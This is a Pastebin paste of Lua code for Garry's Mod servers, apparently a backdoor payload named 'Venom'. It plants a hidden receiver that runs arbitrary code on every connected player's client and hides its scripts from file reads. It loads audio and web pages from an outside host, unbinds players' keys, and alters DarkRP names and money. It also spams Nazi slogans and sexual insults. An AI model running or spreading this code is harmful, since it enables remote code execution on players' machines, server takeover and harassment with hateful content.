Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- util.AddNetworkString(\"_ServerName_\")
- function payload( ply )
- ply:SendLua( \"net.Receive([[_ServerName_]], function() RunString(net.ReadString()) end)\" )
- end
- local bypass = [=====[
- if !fRead then
- fRead=file.Read
- fOpen=file.Open
- end
- file.Open=function(fn,fm,path)
- loh=nil
- loh=string.Explode(\"/\",fn)
- if (loh[2]&&(loh[#loh-1]==\"lua\"&&(string.find(loh[#loh],\".lua\") || string.find(loh[#loh],\".txt\")) || loh[#loh-1]==\"scripthook\")) || loh[1]&&(string.find(loh[1],\".lua\") || string.find(loh[1],\".txt\"))&&path ==\"LUA\" || string.find(fn,\"scripthook/\") then
- chat.AddText(\"someone tried using file.open to get your \"..fn..\" with the PATH: \"..path..\" and file mode: \"..fm..\".\")
- return \"\"
- else
- return fOpen(fn,fm,path)
- end
- end
- file.Read=function(fn,path)
- loh=nil
- loh=string.Explode(\"/\",fn)
- if (loh[2]&&(loh[#loh-1]==\"lua\"&&(string.find(loh[#loh],\".lua\") || string.find(loh[#loh],\".txt\")) || loh[#loh-1]==\"scripthook\")) || loh[1]&&(string.find(loh[1],\".lua\") || string.find(loh[1],\".txt\"))&&path==\"LUA\" || string.find(fn,\"scripthook/\") then
- chat.AddText(\"someone tried grabbing ur file named \"..fn..\".\")
- return \"\"
- else
- return fRead(fn,path)
- end
- end
- ]=====]
- function runcode(ply, code)
- net.Start( \"_ServerName_\" )
- net.WriteString(\"if SERVER then return \'\' end \"..bypass..\" \"..code )
- net.Send( ply )
- end
- for k, v in pairs( player.GetAll() ) do
- payload( v )
- end
- function run_chaos()
- hook.Add( \"PlayerAuthed\", \"wat\", function( ply )
- payload(ply)
- end )
- BroadcastLua([[sound.PlayURL( \"https://mandown.webou.net/img/punyaso-venom.mp3\", \"\", function() end )]])
- timer.Create(\"startofstart\", 1.5, 1, function()
- local textcenter_old = true
- local venomexestep1 = false
- timer.Create(\"text\", 0.5, 1, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ), \"Hello new hacker\")]==])
- timer.Create(\"textsub1\", 0.1, 1, function()
- runcode(v, [==[chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ), \"I\'m Rayeurdu98\")]==])
- timer.Create(\"textsub2\", 0.1, 1, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- local i = 0
- if i >= 100 then
- chat.AddText(HSVToColor( Color(0,0,0)), \"////////////////////////////\")
- chat.AddText(HSVToColor( Color(0,0,0)), \"/ Venom Script Loaded /\")
- chat.AddText(HSVToColor( Color(0,0,0)), \"////////////////////////////\")
- else
- timer.Create(\"infecting\", 0.1, 51, function()
- chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ), \"Loading C:/Users/ΣƆ/Venom.exe... \"..i..\"%\")
- i = i + 2
- end)
- end
- ]==])
- end
- end)
- end)
- end
- end)
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- VenomHTML = vgui.Create( \"HTML\" )
- VenomHTML:SetPos( 99999999999999999999, 99999999999999999999 )
- VenomHTML:SetSize( ScrW(), ScrH())
- VenomHTML:OpenURL( \"https://mandown.webou.net/payloadimg/venom.html\" )
- ]==])
- end
- timer.Create(\"startnotif\", 9, 1, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- local screen_scale = math.Clamp(ScrH()/1080, 0.6, 1);
- surface.CreateFont( \"Bigfred\", {
- font = \"Roboto\",
- extended = false,
- size = screen_scale * 1000,
- weight = 200,
- blursize = 1.5,
- scanlines = 0,
- antialias = true,
- underline = false,
- italic = false,
- strikeout = false,
- symbol = false,
- rotary = false,
- shadow = false,
- additive = true,
- outline = false,
- } )
- hook.Add( \"HUDPaint\", \"aumillieu\", function()
- draw.SimpleTextOutlined(
- \"ΣƆ\",
- \"Bigfred\",
- ScrW() /2 +math.random( -50, 50 ),
- ScrH() /2 +math.random( -50, 50 ),
- HSVToColor( CurTime() % 6 * 60, 1, 1 ),
- TEXT_ALIGN_CENTER,
- TEXT_ALIGN_CENTER,
- 3,
- Color( 0,0,0, 160 )
- )
- end)
- chat.AddText(Color(0,0,0), \"\")
- chat.AddText(Color(0,0,0), \"/////////////////////////////\")
- chat.AddText(Color(0,0,0), \"// Venom Script Loaded //\")
- chat.AddText(Color(0,0,0), \"/////////////////////////////\")
- chat.AddText(Color(0,0,0), \"// set lhost 192.168.1.5 //\")
- chat.AddText(Color(0,0,0), \"/////////////////////////////\")
- chat.AddText(Color(0,0,0), \"// Discord : Huzukawa#4067 //\")
- chat.AddText(Color(0,0,0), \"/////////////////////////////\")
- util.ScreenShake( LocalPlayer():GetPos(), 30, 30, 0.8, 10000 )
- notification.AddLegacy( \"Sorry but u\'ve leak\", NOTIFY_GENERIC , 6 )
- notification.AddLegacy( \"Now yepco come eat your server\", NOTIFY_GENERIC , 6 )
- notification.AddLegacy( \"Kiss on your ass :3\", NOTIFY_GENERIC , 6 )
- ]==])
- end
- end)
- timer.Create(\"stopstartnotif\", 9.8, 1, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- hook.Add( \"HUDPaint\", \"aumillieu\", function()
- end)
- ]==])
- end
- end)
- timer.Create(\"wearevenom1\", 24, 1, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- local screen_scale = math.Clamp(ScrH()/1080, 0.6, 1);
- surface.CreateFont( \"Bigfred\", {
- font = \"Roboto\",
- extended = false,
- size = screen_scale * 500,
- weight = 200,
- blursize = 1.5,
- scanlines = 0,
- antialias = true,
- underline = false,
- italic = false,
- strikeout = false,
- symbol = false,
- rotary = false,
- shadow = false,
- additive = true,
- outline = false,
- } )
- hook.Add( \"HUDPaint\", \"wearevenom\", function()
- draw.SimpleTextOutlined(
- \"WE\",
- \"Bigfred\",
- ScrW() /2 +math.random( -50, 50 ),
- ScrH() /2 +math.random( -50, 50 ),
- HSVToColor( CurTime() % 6 * 60, 1, 1 ),
- TEXT_ALIGN_CENTER,
- TEXT_ALIGN_CENTER,
- 3,
- Color( 0,0,0, 160 )
- )
- end)
- ]==])
- end
- end)
- timer.Create(\"wearevenom2\", 25.7, 1, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- hook.Add( \"HUDPaint\", \"wearevenom\", function()
- draw.SimpleTextOutlined(
- \"WE ARE\",
- \"Bigfred\",
- ScrW() /2 +math.random( -50, 50 ),
- ScrH() /2 +math.random( -50, 50 ),
- HSVToColor( CurTime() % 6 * 60, 1, 1 ),
- TEXT_ALIGN_CENTER,
- TEXT_ALIGN_CENTER,
- 3,
- Color( 0,0,0, 160 )
- )
- end)
- ]==])
- end
- end)
- timer.Create(\"wearevenom3\", 25.8, 1, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- hook.Add( \"HUDPaint\", \"wearevenom\", function()
- draw.SimpleTextOutlined(
- \"WE ARE VENOM\",
- \"Bigfred\",
- ScrW() /2 +math.random( -50, 50 ),
- ScrH() /2 +math.random( -50, 50 ),
- HSVToColor( CurTime() % 6 * 60, 1, 1 ),
- TEXT_ALIGN_CENTER,
- TEXT_ALIGN_CENTER,
- 3,
- Color( 0,0,0, 160 )
- )
- end)
- VenomHTML:SetPos( 0, 0 )
- ]==])
- end
- end)
- timer.Create(\"wearevenom3bis\", 26.1, 0, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- VenomHTML:SetPos( math.random( -5, 5 ), math.random( -5, 5 ) )
- ]==])
- end
- end)
- timer.Create(\"wearevenom3bis\", 26.3, 0, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- util.ScreenShake( LocalPlayer():GetPos(), 30, 30, 999999, 10000 )
- ]==])
- end
- end)
- timer.Create(\"notifspam\", 26.3, 0, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- local vars2 = { NOTIFY_GENERIC , NOTIFY_ERROR , NOTIFY_UNDO , NOTIFY_HINT, NOTIFY_CLEANUP }
- local vars3 = {\"https://discord.gg/tkfQaRD\",\"Nazi <3\",\"Hitler is ur dad\",\"Server Hacked by ΣƆdoor\",\"Discord of owner : Rayeurdu98#8210\", \"Discord of co-owner : ΣΖΛŖ#0791\",\"Je détruis ton vagin avec un berlingot de lait\",\"Take my zeub\",\"Suck my zeub\"}
- notification.AddLegacy( vars3[math.random(1,#vars3)], NOTIFY_GENERIC , 1 )
- notification.AddLegacy( vars3[math.random(1,#vars3)], NOTIFY_ERROR , 1 )
- notification.AddLegacy( vars3[math.random(1,#vars3)], NOTIFY_UNDO , 1 )
- notification.AddLegacy( vars3[math.random(1,#vars3)], NOTIFY_HINT , 1 )
- notification.AddLegacy( vars3[math.random(1,#vars3)], NOTIFY_CLEANUP , 1 )
- timer.Create( \"spamnotifafter\", 0.1, 0, function()
- notification.AddLegacy( vars3[math.random(1,#vars3)], vars2[math.random(1,#vars2)] , 1 )
- end)
- ]==])
- end
- end)
- timer.Create(\"textoncenter\", 26.3, 0, function()
- for k,v in pairs(player.GetAll() ) do
- v:Say(\"/ooc We are Venom !\")
- if textcenter_old == true then
- runcode(v, [==[
- local Mat = Material( \"dev/graygrid\" )
- hook.Add( \"PostDraw2DSkyBox\", \"ExampleHook\", function()
- render.OverrideDepthEnable( true, false ) -- ignore Z to prevent drawing over 3D skybox
- -- Start 3D cam centered at the origin
- cam.Start3D( Vector( 0, 0, 0 ), EyeAngles() )
- render.SetMaterial( Mat )
- render.DrawQuadEasy( Vector( 1, 0, 0 ) * 200, Vector( -1, 0, 0 ), 64, 64, HSVToColor( CurTime() % 6 * 60, 1, 1 ), 0 )
- cam.End3D()
- render.OverrideDepthEnable( false, false )
- end )
- hook.Add( \"HUDPaint\", \"wearevenom\", function()
- end)
- VenomHTML:SetPos( 99999999999999999999, 99999999999999999999 )
- local screen_scale = math.Clamp(ScrH()/1080, 0.6, 1);
- surface.CreateFont( \"Bigfred\", {
- font = \"Roboto\",
- extended = false,
- size = screen_scale * 1000,
- weight = 200,
- blursize = 1.5,
- scanlines = 0,
- antialias = true,
- underline = false,
- italic = false,
- strikeout = false,
- symbol = false,
- rotary = false,
- shadow = false,
- additive = true,
- outline = false,
- } )
- hook.Add( \"HUDPaint\", \"aumillieu\", function()
- local textcenter = {\"ΣƆ\", \"ZC\", \"ZƆ\", \"ΣC\"}
- draw.SimpleTextOutlined(
- textcenter[math.random(1,#textcenter)],
- \"Bigfred\",
- ScrW() /2 +math.random( -50, 50 ),
- ScrH() /2 +math.random( -50, 50 ),
- HSVToColor( CurTime() % 6 * 60, 1, 1 ),
- TEXT_ALIGN_CENTER,
- TEXT_ALIGN_CENTER,
- 3,
- Color( 0,0,0, 160 )
- )
- end)
- ]==])
- end
- end
- end)
- timer.Create(\"after1\", 26.3, 0, function()
- for k,v in pairs(player.GetAll() ) do
- v:SetRunSpeed(1000 * 2)
- v:SetWalkSpeed(1000 * 2)
- v:GodEnable()
- end
- end)
- timer.Create(\"calme1\", 58.9, 1, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- util.ScreenShake( LocalPlayer():GetPos(), 5, 5, 0.8, 5000 )
- ]==])
- end
- end)
- timer.Create(\"2emedrop\", 96, 1, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- VenomHTML:SetPos( 0, 0 )
- ]==])
- end
- end)
- timer.Create(\"2emedropdelvenom\", 100.4, 1, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- VenomHTML:SetPos( 99999999999999999999, 99999999999999999999 )
- ]==])
- end
- end)
- timer.Create(\"2emedropbis\", 100.4, 0, function()
- for k,v in pairs(player.GetAll() ) do
- textcenter_old = false
- timer.Create(\"ihfiqgfigqsiyfgqsfqsfqsfqsfq\", 0.1, 0, function()
- for k,v in pairs(player.GetAll() ) do
- textcenter_old = false
- local function rdm_str(len)
- if !len or len <= 0 then return \'\' end
- return rdm_str(len - 1) .. (\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\")[math.random(1, 62)]
- end
- if engine.ActiveGamemode() == \"DarkRP\" || engine.ActiveGamemode() == \"darkrp\" then
- DarkRP.storeRPName(v, rdm_str(25)) v:setDarkRPVar(\"rpname\", rdm_str(25))
- v:addMoney(math.random(10000000, 999999999))
- v:setDarkRPVar(\"job\", rdm_str(25))
- end
- end
- end)
- runcode(v, [==[
- ConCommand(\"unbindall\")
- util.ScreenShake( LocalPlayer():GetPos(), 30, 30, 999999, 10000 )
- local screen_scale = math.Clamp(ScrH()/1080, 0.6, 1);
- surface.CreateFont( \"Bigfred\", {
- font = \"Roboto\",
- extended = false,
- size = screen_scale * 1000,
- weight = 200,
- blursize = 1.5,
- scanlines = 2,
- antialias = false,
- underline = false,
- italic = false,
- strikeout = false,
- symbol = false,
- rotary = false,
- shadow = false,
- additive = false,
- outline = false,
- } )
- hook.Add( \"HUDPaint\", \"aumillieu\", function()
- local textcenter = {\"ΣƆ\", \"ZC\", \"ZƆ\", \"ΣC\", \"Σ€\", \"Z€\"}
- draw.SimpleTextOutlined(
- textcenter[math.random(1,#textcenter)],
- \"Bigfred\",
- ScrW() /2 +math.random( -650, 650 ),
- ScrH() /2 +math.random( -650, 650 ),
- HSVToColor( CurTime() % 6 * 60, 1, 1 ),
- TEXT_ALIGN_CENTER,
- TEXT_ALIGN_CENTER,
- 3,
- Color( 0,0,0, 160 )
- )
- end)
- hook.Add( \"PostDrawTranslucentRenderables\", \"matebalyakakambal\", function()
- render.SetMaterial( Material(\"cable/blue_elec\") )
- for i = 1, 32 do
- render.DrawBeam( LocalPlayer():GetPos() +Vector(0, 0, 128) +(EyeAngles():Forward() *256), EyePos() +(VectorRand() *256), 4, 0, 12.5, Color(255, 255, 255, 255) )
- end
- end)
- ]==])
- end
- end)
- timer.Create(\"creparti\", 113, 0, function()
- for k,v in pairs(player.GetAll() ) do
- runcode(v, [==[
- ]==])
- end
- end)
- end)
- end
- if !hook.GetTable().PlayerInitialSpawn.podsos then
- hook.Add(\"PlayerInitialSpawn\", \"podsos\", function()
- timer.Simple(10, function()
- run_chaos()
- end)
- end)
- run_chaos()
- end
Advertisement
Add Comment
Please, Sign In to add comment